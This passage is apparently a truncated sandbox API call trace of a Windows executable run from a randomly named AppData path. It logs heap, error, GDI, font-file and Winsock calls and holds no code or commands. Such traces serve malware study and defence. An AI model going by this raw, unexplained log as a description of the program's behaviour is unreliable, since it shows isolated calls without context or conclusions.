!\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ\nã\x03\x9c\x9cþ\x18", lpUsedDefaultChar=0x0) returned 256 [0100.468] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x420c28, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\gtjtdfe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\gtjtdfe")) returned 0x35 [0100.468] GetLastError () returned 0x0 [0100.468] SetLastError (dwErrCode=0x0) [0100.468] GetLastError () returned 0x0 [0100.468] SetLastError (dwErrCode=0x0) [0100.468] GetLastError () returned 0x0 [0100.468] SetLastError (dwErrCode=0x0) [0100.468] GetLastError () returned 0x0 [0100.468] SetLastError (dwErrCode=0x0) [0100.468] GetLastError () returned 0x0 [0100.468] SetLastError (dwErrCode=0x0) [0100.468] GetLastError () returned 0x0 [0100.468] SetLastError (dwErrCode=0x0) [0100.468] GetLastError () returned 0x0 [0100.468] SetLastError (dwErrCode=0x0) [0100.468] GetLastError () returned 0x0 [0100.468] SetLastError (dwErrCode=0x0) [0100.468] GetLastError () returned 0x0 [0100.469] SetLastError (dwErrCode=0x0) [0100.469] GetLastError () returned 0x0 [0100.469] SetLastError (dwErrCode=0x0) [0100.469] GetLastError () returned 0x0 [0100.469] SetLastError (dwErrCode=0x0) [0100.469] GetLastError () returned 0x0 [0100.469] SetLastError (dwErrCode=0x0) [0100.469] GetLastError () returned 0x0 [0100.469] SetLastError (dwErrCode=0x0) [0100.469] GetLastError () returned 0x0 [0100.469] SetLastError (dwErrCode=0x0) [0100.469] GetLastError () returned 0x0 [0100.469] SetLastError (dwErrCode=0x0) [0100.469] GetLastError () returned 0x0 [0100.469] SetLastError (dwErrCode=0x0) [0100.469] GetLastError () returned 0x0 [0100.469] SetLastError (dwErrCode=0x0) [0100.469] GetLastError () returned 0x0 [0100.469] SetLastError (dwErrCode=0x0) [0100.469] GetLastError () returned 0x0 [0100.469] SetLastError (dwErrCode=0x0) [0100.469] GetLastError () returned 0x0 [0100.469] SetLastError (dwErrCode=0x0) [0100.469] GetLastError () returned 0x0 [0100.470] SetLastError (dwErrCode=0x0) [0100.470] GetLastError () returned 0x0 [0100.470] SetLastError (dwErrCode=0x0) [0100.470] GetLastError () returned 0x0 [0100.470] SetLastError (dwErrCode=0x0) [0100.470] GetLastError () returned 0x0 [0100.470] SetLastError (dwErrCode=0x0) [0100.470] GetLastError () returned 0x0 [0100.470] SetLastError (dwErrCode=0x0) [0100.470] GetLastError () returned 0x0 [0100.470] SetLastError (dwErrCode=0x0) [0100.470] GetLastError () returned 0x0 [0100.470] SetLastError (dwErrCode=0x0) [0100.470] GetLastError () returned 0x0 [0100.470] SetLastError (dwErrCode=0x0) [0100.470] GetLastError () returned 0x0 [0100.470] SetLastError (dwErrCode=0x0) [0100.470] GetLastError () returned 0x0 [0100.470] SetLastError (dwErrCode=0x0) [0100.470] GetLastError () returned 0x0 [0100.470] SetLastError (dwErrCode=0x0) [0100.470] GetLastError () returned 0x0 [0100.470] SetLastError (dwErrCode=0x0) [0100.470] GetLastError () returned 0x0 [0100.470] SetLastError (dwErrCode=0x0) [0100.470] GetLastError () returned 0x0 [0100.471] SetLastError (dwErrCode=0x0) [0100.471] GetLastError () returned 0x0 [0100.471] SetLastError (dwErrCode=0x0) [0100.471] GetLastError () returned 0x0 [0100.471] SetLastError (dwErrCode=0x0) [0100.471] GetLastError () returned 0x0 [0100.471] SetLastError (dwErrCode=0x0) [0100.471] GetLastError () returned 0x0 [0100.471] SetLastError (dwErrCode=0x0) [0100.471] GetLastError () returned 0x0 [0100.471] SetLastError (dwErrCode=0x0) [0100.471] GetLastError () returned 0x0 [0100.471] SetLastError (dwErrCode=0x0) [0100.471] GetLastError () returned 0x0 [0100.471] SetLastError (dwErrCode=0x0) [0100.471] GetLastError () returned 0x0 [0100.471] SetLastError (dwErrCode=0x0) [0100.471] GetLastError () returned 0x0 [0100.471] SetLastError (dwErrCode=0x0) [0100.471] GetLastError () returned 0x0 [0100.471] SetLastError (dwErrCode=0x0) [0100.471] GetLastError () returned 0x0 [0100.471] SetLastError (dwErrCode=0x0) [0100.471] GetLastError () returned 0x0 [0100.471] SetLastError (dwErrCode=0x0) [0100.472] GetLastError () returned 0x0 [0100.472] SetLastError (dwErrCode=0x0) [0100.472] GetLastError () returned 0x0 [0100.472] SetLastError (dwErrCode=0x0) [0100.472] GetLastError () returned 0x0 [0100.472] SetLastError (dwErrCode=0x0) [0100.472] GetLastError () returned 0x0 [0100.472] SetLastError (dwErrCode=0x0) [0100.472] GetLastError () returned 0x0 [0100.472] SetLastError (dwErrCode=0x0) [0100.472] GetLastError () returned 0x0 [0100.472] SetLastError (dwErrCode=0x0) [0100.472] GetLastError () returned 0x0 [0100.472] SetLastError (dwErrCode=0x0) [0100.472] GetLastError () returned 0x0 [0100.472] SetLastError (dwErrCode=0x0) [0100.472] RtlAllocateHeap (HeapHandle=0x34d0000, Flags=0x0, Size=0x3e) returned 0x34d1990 [0100.472] GetLastError () returned 0x0 [0100.472] SetLastError (dwErrCode=0x0) [0100.472] GetLastError () returned 0x0 [0100.472] SetLastError (dwErrCode=0x0) [0100.473] GetLastError () returned 0x0 [0100.473] SetLastError (dwErrCode=0x0) [0100.473] GetLastError () returned 0x0 [0100.473] SetLastError (dwErrCode=0x0) [0100.473] GetLastError () returned 0x0 [0100.473] SetLastError (dwErrCode=0x0) [0100.473] GetLastError () returned 0x0 [0100.473] SetLastError (dwErrCode=0x0) [0100.473] GetLastError () returned 0x0 [0100.473] SetLastError (dwErrCode=0x0) [0100.473] GetLastError () returned 0x0 [0100.473] SetLastError (dwErrCode=0x0) [0100.473] GetLastError () returned 0x0 [0100.473] SetLastError (dwErrCode=0x0) [0100.473] GetLastError () returned 0x0 [0100.473] SetLastError (dwErrCode=0x0) [0100.474] GetLastError () returned 0x0 [0100.474] SetLastError (dwErrCode=0x0) [0100.474] GetLastError () returned 0x0 [0100.474] SetLastError (dwErrCode=0x0) [0100.474] GetLastError () returned 0x0 [0100.474] SetLastError (dwErrCode=0x0) [0100.474] GetLastError () returned 0x0 [0100.474] SetLastError (dwErrCode=0x0) [0100.474] GetLastError () returned 0x0 [0100.474] SetLastError (dwErrCode=0x0) [0100.474] GetLastError () returned 0x0 [0100.474] SetLastError (dwErrCode=0x0) [0100.474] GetLastError () returned 0x0 [0100.474] SetLastError (dwErrCode=0x0) [0100.474] GetLastError () returned 0x0 [0100.474] SetLastError (dwErrCode=0x0) [0100.474] GetLastError () returned 0x0 [0100.474] SetLastError (dwErrCode=0x0) [0100.474] GetLastError () returned 0x0 [0100.474] SetLastError (dwErrCode=0x0) [0100.474] GetLastError () returned 0x0 [0100.474] SetLastError (dwErrCode=0x0) [0100.474] GetLastError () returned 0x0 [0100.474] SetLastError (dwErrCode=0x0) [0100.474] GetLastError () returned 0x0 [0100.475] SetLastError (dwErrCode=0x0) [0100.475] GetLastError () returned 0x0 [0100.475] SetLastError (dwErrCode=0x0) [0100.475] GetLastError () returned 0x0 [0100.475] SetLastError (dwErrCode=0x0) [0100.475] GetLastError () returned 0x0 [0100.475] SetLastError (dwErrCode=0x0) [0100.475] GetLastError () returned 0x0 [0100.475] SetLastError (dwErrCode=0x0) [0100.475] GetLastError () returned 0x0 [0100.475] SetLastError (dwErrCode=0x0) [0100.475] GetLastError () returned 0x0 [0100.475] SetLastError (dwErrCode=0x0) [0100.475] GetLastError () returned 0x0 [0100.475] SetLastError (dwErrCode=0x0) [0100.475] GetLastError () returned 0x0 [0100.475] SetLastError (dwErrCode=0x0) [0100.475] GetLastError () returned 0x0 [0100.475] SetLastError (dwErrCode=0x0) [0100.475] GetLastError () returned 0x0 [0100.475] SetLastError (dwErrCode=0x0) [0100.475] GetLastError () returned 0x0 [0100.475] SetLastError (dwErrCode=0x0) [0100.475] GetLastError () returned 0x0 [0100.475] SetLastError (dwErrCode=0x0) [0100.475] GetLastError () returned 0x0 [0100.476] SetLastError (dwErrCode=0x0) [0100.476] GetLastError () returned 0x0 [0100.476] SetLastError (dwErrCode=0x0) [0100.476] GetLastError () returned 0x0 [0100.476] SetLastError (dwErrCode=0x0) [0100.476] GetLastError () returned 0x0 [0100.476] SetLastError (dwErrCode=0x0) [0100.476] GetLastError () returned 0x0 [0100.476] SetLastError (dwErrCode=0x0) [0100.476] GetLastError () returned 0x0 [0100.476] SetLastError (dwErrCode=0x0) [0100.476] GetLastError () returned 0x0 [0100.476] SetLastError (dwErrCode=0x0) [0100.476] GetLastError () returned 0x0 [0100.476] SetLastError (dwErrCode=0x0) [0100.476] GetLastError () returned 0x0 [0100.476] SetLastError (dwErrCode=0x0) [0100.476] GetLastError () returned 0x0 [0100.476] SetLastError (dwErrCode=0x0) [0100.476] GetLastError () returned 0x0 [0100.476] SetLastError (dwErrCode=0x0) [0100.476] GetLastError () returned 0x0 [0100.476] SetLastError (dwErrCode=0x0) [0100.476] GetLastError () returned 0x0 [0100.476] SetLastError (dwErrCode=0x0) [0100.477] GetLastError () returned 0x0 [0100.477] SetLastError (dwErrCode=0x0) [0100.477] GetLastError () returned 0x0 [0100.477] SetLastError (dwErrCode=0x0) [0100.477] GetLastError () returned 0x0 [0100.477] SetLastError (dwErrCode=0x0) [0100.477] GetLastError () returned 0x0 [0100.477] SetLastError (dwErrCode=0x0) [0100.477] GetLastError () returned 0x0 [0100.477] SetLastError (dwErrCode=0x0) [0100.477] GetLastError () returned 0x0 [0100.477] SetLastError (dwErrCode=0x0) [0100.477] RtlAllocateHeap (HeapHandle=0x34d0000, Flags=0x8, Size=0x98) returned 0x34d19d8 [0100.477] RtlAllocateHeap (HeapHandle=0x34d0000, Flags=0x8, Size=0x1f) returned 0x34d1a78 [0100.477] RtlAllocateHeap (HeapHandle=0x34d0000, Flags=0x8, Size=0x36) returned 0x34d1aa0 [0100.477] RtlAllocateHeap (HeapHandle=0x34d0000, Flags=0x8, Size=0x37) returned 0x34d1ae0 [0100.477] RtlAllocateHeap (HeapHandle=0x34d0000, Flags=0x8, Size=0x3c) returned 0x34d1b20 [0100.477] RtlAllocateHeap (HeapHandle=0x34d0000, Flags=0x8, Size=0x31) returned 0x34d1b68 [0100.477] RtlAllocateHeap (HeapHandle=0x34d0000, Flags=0x8, Size=0x17) returned 0x34d1ba8 [0100.477] RtlAllocateHeap (HeapHandle=0x34d0000, Flags=0x8, Size=0x24) returned 0x34d1bc8 [0100.477] RtlAllocateHeap (HeapHandle=0x34d0000, Flags=0x8, Size=0x14) returned 0x34d1bf8 [0100.477] RtlAllocateHeap (HeapHandle=0x34d0000, Flags=0x8, Size=0xd) returned 0x34d1c18 [0100.477] RtlAllocateHeap (HeapHandle=0x34d0000, Flags=0x8, Size=0x25) returned 0x34d1c30 [0100.477] RtlAllocateHeap (HeapHandle=0x34d0000, Flags=0x8, Size=0x39) returned 0x34d1c60 [0100.477] RtlAllocateHeap (HeapHandle=0x34d0000, Flags=0x8, Size=0x18) returned 0x34d1ca8 [0100.477] RtlAllocateHeap (HeapHandle=0x34d0000, Flags=0x8, Size=0x17) returned 0x34d1cc8 [0100.477] RtlAllocateHeap (HeapHandle=0x34d0000, Flags=0x8, Size=0xe) returned 0x34d1ce8 [0100.477] RtlAllocateHeap (HeapHandle=0x34d0000, Flags=0x8, Size=0x69) returned 0x34d1d00 [0100.477] RtlAllocateHeap (HeapHandle=0x34d0000, Flags=0x8, Size=0x3e) returned 0x34d1d78 [0100.477] RtlAllocateHeap (HeapHandle=0x34d0000, Flags=0x8, Size=0x1b) returned 0x34d1dc0 [0100.477] RtlAllocateHeap (HeapHandle=0x34d0000, Flags=0x8, Size=0x1d) returned 0x34d1de8 [0100.477] RtlAllocateHeap (HeapHandle=0x34d0000, Flags=0x8, Size=0x48) returned 0x34d1e10 [0100.477] RtlAllocateHeap (HeapHandle=0x34d0000, Flags=0x8, Size=0x12) returned 0x34d1e60 [0100.477] RtlAllocateHeap (HeapHandle=0x34d0000, Flags=0x8, Size=0x18) returned 0x34d1e80 [0100.478] RtlAllocateHeap (HeapHandle=0x34d0000, Flags=0x8, Size=0x1b) returned 0x34d1ea0 [0100.478] RtlAllocateHeap (HeapHandle=0x34d0000, Flags=0x8, Size=0x24) returned 0x34d1ec8 [0100.478] RtlAllocateHeap (HeapHandle=0x34d0000, Flags=0x8, Size=0x29) returned 0x34d1ef8 [0100.478] RtlAllocateHeap (HeapHandle=0x34d0000, Flags=0x8, Size=0x1e) returned 0x34d1f30 [0100.478] RtlAllocateHeap (HeapHandle=0x34d0000, Flags=0x8, Size=0x41) returned 0x34d1f58 [0100.478] RtlAllocateHeap (HeapHandle=0x34d0000, Flags=0x8, Size=0x17) returned 0x34d1fa8 [0100.478] RtlAllocateHeap (HeapHandle=0x34d0000, Flags=0x8, Size=0xf) returned 0x34d1fc8 [0100.478] RtlAllocateHeap (HeapHandle=0x34d0000, Flags=0x8, Size=0x16) returned 0x34d1fe8 [0100.478] RtlAllocateHeap (HeapHandle=0x34d0000, Flags=0x8, Size=0x2a) returned 0x34d2008 [0100.478] RtlAllocateHeap (HeapHandle=0x34d0000, Flags=0x8, Size=0x29) returned 0x34d2040 [0100.478] RtlAllocateHeap (HeapHandle=0x34d0000, Flags=0x8, Size=0x15) returned 0x34d2078 [0100.478] RtlAllocateHeap (HeapHandle=0x34d0000, Flags=0x8, Size=0x1e) returned 0x34d2098 [0100.478] RtlAllocateHeap (HeapHandle=0x34d0000, Flags=0x8, Size=0x2a) returned 0x34d20c0 [0100.478] RtlAllocateHeap (HeapHandle=0x34d0000, Flags=0x8, Size=0x12) returned 0x34d20f8 [0100.478] RtlAllocateHeap (HeapHandle=0x34d0000, Flags=0x8, Size=0x18) returned 0x34d2118 [0100.478] RtlAllocateHeap (HeapHandle=0x34d0000, Flags=0x8, Size=0x46) returned 0x34d2138 [0100.478] HeapFree (in: hHeap=0x34d0000, dwFlags=0x0, lpMem=0x34d11f8 | out: hHeap=0x34d0000) returned 1 [0100.478] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0100.478] RtlAllocateHeap (HeapHandle=0x34d0000, Flags=0x8, Size=0x800) returned 0x34d2188 [0100.479] RtlAllocateHeap (HeapHandle=0x34d0000, Flags=0x8, Size=0x80) returned 0x34d11f8 [0100.479] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0100.479] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x40bbc8) returned 0x0 [0100.479] RtlSizeHeap (HeapHandle=0x34d0000, Flags=0x0, MemoryPointer=0x34d11f8) returned 0x80 [0100.479] GetLastError () returned 0x0 [0100.479] SetLastError (dwErrCode=0x0) [0100.479] GetLastError () returned 0x0 [0100.479] SetLastError (dwErrCode=0x0) [0100.480] GetLastError () returned 0x0 [0100.480] SetLastError (dwErrCode=0x0) [0100.480] GetLastError () returned 0x0 [0100.480] SetLastError (dwErrCode=0x0) [0100.480] GetLastError () returned 0x0 [0100.480] SetLastError (dwErrCode=0x0) [0100.480] GetLastError () returned 0x0 [0100.480] SetLastError (dwErrCode=0x0) [0100.480] GetLastError () returned 0x0 [0100.480] SetLastError (dwErrCode=0x0) [0100.480] GetLastError () returned 0x0 [0100.480] SetLastError (dwErrCode=0x0) [0100.480] GetLastError () returned 0x0 [0100.480] SetLastError (dwErrCode=0x0) [0100.480] GetLastError () returned 0x0 [0100.480] SetLastError (dwErrCode=0x0) [0100.480] GetLastError () returned 0x0 [0100.480] SetLastError (dwErrCode=0x0) [0100.480] GetLastError () returned 0x0 [0100.480] SetLastError (dwErrCode=0x0) [0100.480] GetLastError () returned 0x0 [0100.480] SetLastError (dwErrCode=0x0) [0100.480] GetLastError () returned 0x0 [0100.480] SetLastError (dwErrCode=0x0) [0100.480] GetLastError () returned 0x0 [0100.481] SetLastError (dwErrCode=0x0) [0100.481] GetLastError () returned 0x0 [0100.481] SetLastError (dwErrCode=0x0) [0100.481] GetLastError () returned 0x0 [0100.481] SetLastError (dwErrCode=0x0) [0100.481] GetLastError () returned 0x0 [0100.481] SetLastError (dwErrCode=0x0) [0100.481] GetLastError () returned 0x0 [0100.481] SetLastError (dwErrCode=0x0) [0100.481] GetLastError () returned 0x0 [0100.481] SetLastError (dwErrCode=0x0) [0100.481] GetLastError () returned 0x0 [0100.481] SetLastError (dwErrCode=0x0) [0100.481] GetLastError () returned 0x0 [0100.481] SetLastError (dwErrCode=0x0) [0100.481] GetLastError () returned 0x0 [0100.481] SetLastError (dwErrCode=0x0) [0100.481] GetLastError () returned 0x0 [0100.481] SetLastError (dwErrCode=0x0) [0100.481] GetLastError () returned 0x0 [0100.481] SetLastError (dwErrCode=0x0) [0100.481] GetLastError () returned 0x0 [0100.481] SetLastError (dwErrCode=0x0) [0100.481] GetLastError () returned 0x0 [0100.481] SetLastError (dwErrCode=0x0) [0100.481] GetLastError () returned 0x0 [0100.482] SetLastError (dwErrCode=0x0) [0100.482] GetLastError () returned 0x0 [0100.482] SetLastError (dwErrCode=0x0) [0100.482] GetLastError () returned 0x0 [0100.482] SetLastError (dwErrCode=0x0) [0100.482] GetLastError () returned 0x0 [0100.482] SetLastError (dwErrCode=0x0) [0100.482] GetLastError () returned 0x0 [0100.482] SetLastError (dwErrCode=0x0) [0100.482] GetLastError () returned 0x0 [0100.482] SetLastError (dwErrCode=0x0) [0100.482] GetLastError () returned 0x0 [0100.482] SetLastError (dwErrCode=0x0) [0100.482] GetLastError () returned 0x0 [0100.482] SetLastError (dwErrCode=0x0) [0100.482] GetLastError () returned 0x0 [0100.482] SetLastError (dwErrCode=0x0) [0100.482] GetLastError () returned 0x0 [0100.482] SetLastError (dwErrCode=0x0) [0100.482] GetLastError () returned 0x0 [0100.482] SetLastError (dwErrCode=0x0) [0100.482] GetLastError () returned 0x0 [0100.482] SetLastError (dwErrCode=0x0) [0100.482] GetLastError () returned 0x0 [0100.482] SetLastError (dwErrCode=0x0) [0100.482] GetLastError () returned 0x0 [0100.483] SetLastError (dwErrCode=0x0) [0100.483] GetLastError () returned 0x0 [0100.483] SetLastError (dwErrCode=0x0) [0100.483] GetLastError () returned 0x0 [0100.483] SetLastError (dwErrCode=0x0) [0100.483] GetLastError () returned 0x0 [0100.483] SetLastError (dwErrCode=0x0) [0100.483] GetLastError () returned 0x0 [0100.483] SetLastError (dwErrCode=0x0) [0100.483] GetLastError () returned 0x0 [0100.483] SetLastError (dwErrCode=0x0) [0100.483] GetLastError () returned 0x0 [0100.483] SetLastError (dwErrCode=0x0) [0100.483] GetLastError () returned 0x0 [0100.483] SetLastError (dwErrCode=0x0) [0100.483] GetLastError () returned 0x0 [0100.483] SetLastError (dwErrCode=0x0) [0100.483] GetLastError () returned 0x0 [0100.483] SetLastError (dwErrCode=0x0) [0100.483] GetLastError () returned 0x0 [0100.483] SetLastError (dwErrCode=0x0) [0100.483] GetLastError () returned 0x0 [0100.483] SetLastError (dwErrCode=0x0) [0100.483] GetLastError () returned 0x0 [0100.483] SetLastError (dwErrCode=0x0) [0100.484] GetLastError () returned 0x0 [0100.484] SetLastError (dwErrCode=0x0) [0100.484] GetLastError () returned 0x0 [0100.484] SetLastError (dwErrCode=0x0) [0100.484] GetWindowsDirectoryA (in: lpBuffer=0x18fdb8, uSize=0x104 | out: lpBuffer="C:\\Windows") returned 0xa [0100.484] RtlAllocateHeap (HeapHandle=0x34d0000, Flags=0x0, Size=0x18) returned 0x34d1280 [0100.484] RtlAllocateHeap (HeapHandle=0x34d0000, Flags=0x0, Size=0x18) returned 0x34d12a0 [0100.484] CreateFileA (lpFileName="C:\\Windows\\Fonts\\arialbd.ttf" (normalized: "c:\\windows\\fonts\\arialbd.ttf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x18fc00, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd0 [0100.484] GetFileType (hFile=0xd0) returned 0x1 [0100.485] ReadFile (in: hFile=0xd0, lpBuffer=0x421720, nNumberOfBytesToRead=0xf4000, lpNumberOfBytesRead=0x18fc30, lpOverlapped=0x0 | out: lpBuffer=0x421720*, lpNumberOfBytesRead=0x18fc30*=0xb6cb0, lpOverlapped=0x0) returned 1 [0100.491] ReadFile (in: hFile=0xd0, lpBuffer=0x4d83d0, nNumberOfBytesToRead=0x3d000, lpNumberOfBytesRead=0x18fc30, lpOverlapped=0x0 | out: lpBuffer=0x4d83d0*, lpNumberOfBytesRead=0x18fc30*=0x0, lpOverlapped=0x0) returned 1 [0100.491] RtlAllocateHeap (HeapHandle=0x34d0000, Flags=0x0, Size=0x8c) returned 0x34d12c0 [0100.491] RtlAllocateHeap (HeapHandle=0x34d0000, Flags=0x0, Size=0x8) returned 0x34d1358 [0100.491] RtlAllocateHeap (HeapHandle=0x34d0000, Flags=0x0, Size=0x60) returned 0x34d1368 [0100.491] RtlAllocateHeap (HeapHandle=0x34d0000, Flags=0x0, Size=0x104) returned 0x34d13d0 [0100.491] RtlAllocateHeap (HeapHandle=0x34d0000, Flags=0x0, Size=0x14) returned 0x34d14e0 [0100.491] RtlAllocateHeap (HeapHandle=0x34d0000, Flags=0x0, Size=0x14) returned 0x34d1500 [0100.491] HeapFree (in: hHeap=0x34d0000, dwFlags=0x0, lpMem=0x34d14e0 | out: hHeap=0x34d0000) returned 1 [0100.491] HeapFree (in: hHeap=0x34d0000, dwFlags=0x0, lpMem=0x34d1500 | out: hHeap=0x34d0000) returned 1 [0100.491] RtlAllocateHeap (HeapHandle=0x34d0000, Flags=0x0, Size=0x14) returned 0x34d14e0 [0100.491] RtlAllocateHeap (HeapHandle=0x34d0000, Flags=0x0, Size=0x14) returned 0x34d1500 [0100.491] HeapFree (in: hHeap=0x34d0000, dwFlags=0x0, lpMem=0x34d1500 | out: hHeap=0x34d0000) returned 1 [0100.491] HeapFree (in: hHeap=0x34d0000, dwFlags=0x0, lpMem=0x34d14e0 | out: hHeap=0x34d0000) returned 1 [0100.491] RtlAllocateHeap (HeapHandle=0x34d0000, Flags=0x0, Size=0x14) returned 0x34d14e0 [0100.491] RtlAllocateHeap (HeapHandle=0x34d0000, Flags=0x0, Size=0x14) returned 0x34d1500 [0100.491] HeapFree (in: hHeap=0x34d0000, dwFlags=0x0, lpMem=0x34d1500 | out: hHeap=0x34d0000) returned 1 [0100.491] HeapFree (in: hHeap=0x34d0000, dwFlags=0x0, lpMem=0x34d14e0 | out: hHeap=0x34d0000) returned 1 [0100.491] HeapFree (in: hHeap=0x34d0000, dwFlags=0x0, lpMem=0x34d13d0 | out: hHeap=0x34d0000) returned 1 [0100.491] HeapFree (in: hHeap=0x34d0000, dwFlags=0x0, lpMem=0x34d1358 | out: hHeap=0x34d0000) returned 1 [0100.491] HeapFree (in: hHeap=0x34d0000, dwFlags=0x0, lpMem=0x34d1368 | out: hHeap=0x34d0000) returned 1 [0100.491] HeapFree (in: hHeap=0x34d0000, dwFlags=0x0, lpMem=0x34d12c0 | out: hHeap=0x34d0000) returned 1 [0100.491] CreateMenu () returned 0xc00f3 [0100.491] LoadMenuA (hInstance=0x400000, lpMenuName="Menu") returned 0x0 [0100.492] LoadBitmapA (hInstance=0x400000, lpBitmapName="Bitmap") returned 0x0 [0100.492] AppendMenuA (hMenu=0xc00f3, uFlags=0x14, uIDNewItem=0x0, lpNewItem=0x0) returned 1 [0100.492] LoadMenuA (hInstance=0x400000, lpMenuName="Edit") returned 0x0 [0100.493] CryptCATGetMemberInfo () returned 0x0 [0100.493] GetDeviceCaps (hdc=0x0, index=112) returned 0 [0100.493] GetDeviceCaps (hdc=0x0, index=88) returned 0 [0100.493] GetDeviceCaps (hdc=0x0, index=113) returned 0 [0100.493] GetDeviceCaps (hdc=0x0, index=90) returned 0 [0100.493] GetDeviceCaps (hdc=0x0, index=110) returned 0 [0100.493] GetDeviceCaps (hdc=0x0, index=88) returned 0 [0100.493] GetDeviceCaps (hdc=0x0, index=112) returned 0 [0100.493] GetDeviceCaps (hdc=0x0, index=111) returned 0 [0100.493] GetDeviceCaps (hdc=0x0, index=90) returned 0 [0100.493] GetDeviceCaps (hdc=0x0, index=113) returned 0 [0100.493] IsWindowEnabled (hWnd=0x0) returned 0 [0100.493] IsWindowEnabled (hWnd=0x0) returned 0 [0100.493] IsWindowEnabled (hWnd=0x0) returned 0 [0100.493] IsWindowEnabled (hWnd=0x0) returned 0 [0100.493] IsWindowEnabled (hWnd=0x0) returned 0 [0100.493] IsWindowEnabled (hWnd=0x0) returned 0 [0100.493] IsWindowEnabled (hWnd=0x0) returned 0 [0100.493] IsWindowEnabled (hWnd=0x0) returned 0 [0100.493] IsWindowEnabled (hWnd=0x0) returned 0 [0100.493] IsWindowEnabled (hWnd=0x0) returned 0 [0100.493] IsWindowEnabled (hWnd=0x0) returned 0 [0100.493] IsWindowEnabled (hWnd=0x0) returned 0 [0100.493] IsWindowEnabled (hWnd=0x0) returned 0 [0100.493] IsWindowEnabled (hWnd=0x0) returned 0 [0100.493] IsWindowEnabled (hWnd=0x0) returned 0 [0100.493] IsWindowEnabled (hWnd=0x0) returned 0 [0100.493] IsWindowEnabled (hWnd=0x0) returned 0 [0100.493] IsWindowEnabled (hWnd=0x0) returned 0 [0100.493] IsWindowEnabled (hWnd=0x0) returned 0 [0100.493] IsWindowEnabled (hWnd=0x0) returned 0 [0100.493] IsWindowEnabled (hWnd=0x0) returned 0 [0100.493] IsWindowEnabled (hWnd=0x0) returned 0 [0100.493] IsWindowEnabled (hWnd=0x0) returned 0 [0100.494] IsWindowEnabled (hWnd=0x0) returned 0 [0100.494] IsWindowEnabled (hWnd=0x0) returned 0 [0100.494] IsWindowEnabled (hWnd=0x0) returned 0 [0100.494] IsWindowEnabled (hWnd=0x0) returned 0 [0100.494] IsWindowEnabled (hWnd=0x0) returned 0 [0100.494] IsWindowEnabled (hWnd=0x0) returned 0 [0100.494] IsWindowEnabled (hWnd=0x0) returned 0 [0100.494] IsWindowEnabled (hWnd=0x0) returned 0 [0100.494] IsWindowEnabled (hWnd=0x0) returned 0 [0100.494] SetPixelFormat (hdc=0x0, format=12, ppfd=0x18fb10) returned 0 [0100.587] WSAStartup (in: wVersionRequired=0x2, lpWSAData=0x18fb94 | out: lpWSAData=0x18fb94) returned 0 [0100.593] SendMessageA (hWnd=0x0, Msg=0x0, wParam=0x0, lParam=0x0) returned 0x0 [0100.593] GetLastError () returned 0x578 [0100.593] CreateICA (pszDriver="DISPLAY", pszDevice=0x0, pszPort=0x0, pdm=0x0) returned 0x80101e1 [0100.594] OleTranslateColor () returned 0x0 [0100.594] SecurityDescriptorToBinarySD (vVarSecDes=0x18fa98, ppSecurityDescriptor=0x18faf8, pdwSDLength=0x18fb4c, pszServerName=0x0, userName=0x0, passWord=0x0, dwFlags=0x0) returned 0x80004005 [0100.594] RtlAllocateHeap (HeapHandle=0x34d0000, Flags=0x0, Size=0x8) returned 0x34d12c0 [0100.594] RtlAllocateHeap (HeapHandle=0x34d0000, Flags=0x0, Size=0x20) returned 0x34d12d0 [0100.594] RtlAllocateHeap (HeapHandle=0x34d0000, Flags=0x0, Size=0x10) returned 0x34d12f8 [0100.594] MoveToEx (in: hdc=0x1, x=100, y=0, lppt=0x0 | out: lppt=0x0) returned 0 [0100.594] BinarySDToSecurityDescriptor (pSecurityDescriptor=0x0, pVarsec=0x18fafc, pszServerName=0x0, userName=0x0, passWord=0x0, dwFlags=0x0) returned 0x80004005 [0100.594] RtlAllocateHeap (HeapHandle=0x34d0000, Flags=0x0, Size=0x8) returned 0x34d1310 [0100.594] RtlAllocateHeap (HeapHandle=0x34d0000, Flags=0x0, Size=0x20) returned 0x34d1320 [0100.594] RtlAllocateHeap (HeapHandle=0x34d0000, Flags=0x0, Size=0x10) returned 0x34d1348 [0100.594] RtlAllocateHeap (HeapHandle=0x34d0000, Flags=0x0, Size=0x10) returned 0x34d1360 [0100.594] HeapFree (in: hHeap=0x34d0000, dwFlags=0x0, lpMem=0x34d1348 | out: hHeap=0x34d0000) returned 1 [0100.594] HeapFree (in: hHeap=0x34d0000, dwFlags=0x0, lpMem=0x34d1360 | out: hHeap=0x34d0000) returned 1 [0100.594] HeapFree (in: hHeap=0x34d0000, dwFlags=0x0, lpMem=0x34d1320 | out: hHeap=0x34d0000) returned 1 [0100.594] MoveToEx (in: hdc=0x1, x=100, y=0, lppt=0x0 | out: lppt=0x0) returned 0 [0100.594] HeapFree (in: hHeap=0x34d0000, dwFlags=0x0, lpMem=0x34d1310 | out: hHeap=0x34d0000) returned 1 [0100.594] RtlAllocateHeap (HeapHandle=0x34d0000, Flags=0x0, Size=0x8) returned 0x34d1310 [0100.594] RtlAllocateHeap (HeapHandle=0x34d0000, Flags=0x0, Size=0x20) returned 0x34d1320 [0100.594] RtlAllocateHeap (HeapHandle=0x34d0000, Flags=0x0, Size=0x10) returned 0x34d1348 [0100.594] RtlAllocateHeap (HeapHandle=0x34d0000, Flags=0x0, Size=0x10) returned 0x34d1360 [0100.594] HeapFree (in: hHeap=0x34d0000, dwFlags=0x0, lpMem=0x34d1348 | out: hHeap=0x34d0000) returned 1 